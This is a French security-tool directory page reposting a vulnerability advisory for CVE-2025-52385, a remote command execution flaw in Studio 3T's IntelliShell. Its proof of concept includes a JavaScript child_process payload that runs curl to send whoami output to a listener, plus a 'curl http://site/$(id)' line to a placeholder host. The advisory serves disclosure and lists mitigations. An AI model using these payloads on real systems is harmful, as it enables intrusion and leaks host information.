Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-52385 — Studio 3T v.2025.1.0 | Kitploit
Outils/GitHubGitHub/kov404/cve-2025-52385
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebTests d'IntrusionDéveloppement de Charges Utiles
GitHubkov404/cve-2025-52385

CVE-2025-52385

Studio 3T v.2025.1.0

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-52385

Logiciel: Studio 3T v.2025.1.0

Rapport de vulnérabilité: Exécution de commandes à distance dans Studio 3T

Aperçu Une vulnérabilité critique dans Studio 3T version 2025.1.0 et antérieures permet à un attaquant distant d'exécuter du code arbitraire via une charge utile conçue exploitant le module child_process dans le composant IntelliShell.

Détails Type de vulnérabilité: Exécution de commandes à distance Produit concerné: Studio 3T, version <= 2025.1.0 Composant concerné: IntelliShell Type d'attaque: À distance Impacts: Exécution de code: Oui Déni de service: Oui Élévation de privilèges: Oui

Description La vulnérabilité permet à un attaquant distant d'exécuter des commandes arbitraires du système d'exploitation en envoyant une charge utile JavaScript malveillante via IntelliShell, en exploitant le module child_process. Il s'agit d'une vulnérabilité d'exécution aveugle, ce qui signifie qu'aucune sortie directe n'est renvoyée à l'attaquant. Vecteur d'attaque

Établissez une connexion à une instance MongoDB. Envoyez une charge utile JavaScript malveillante via IntelliShell qui utilise le module child_process pour exécuter des commandes arbitraires du système d'exploitation.

Preuve de concept Pour vérifier la vulnérabilité, utilisez les étapes suivantes:

Configurez un serveur HTTP local:python3 -m http.server 80

Exécutez la charge utile JavaScript suivante dans IntelliShell: const {exec} = require('child_process'); exec('curl 127.0.0.1/$(whoami)', (error, stdout, stderr) => console.log(stdout));

Alternativement, utilisez la commande ci-dessous comme vecteur de vérification:curl http://site/$(id) Références

Site Web officiel de Studio 3T

Dépôt GitHub de Studio 3T

CWE-78: Injection de commandes système

CWE-94: Injection de code

Atténuation Utilisateurs: Mettez à niveau vers une version corrigée de Studio 3T (si disponible) ou évitez d'utiliser IntelliShell avec des connexions MongoDB non fiables. Éditeurs: Restreignez ou assainissez les entrées du module child_process dans IntelliShell pour empêcher l'exécution de commandes non autorisées.

Remerciements Cette vulnérabilité a été découverte et signalée par Kaio Mendonca Pereira.

Télécharger l’outil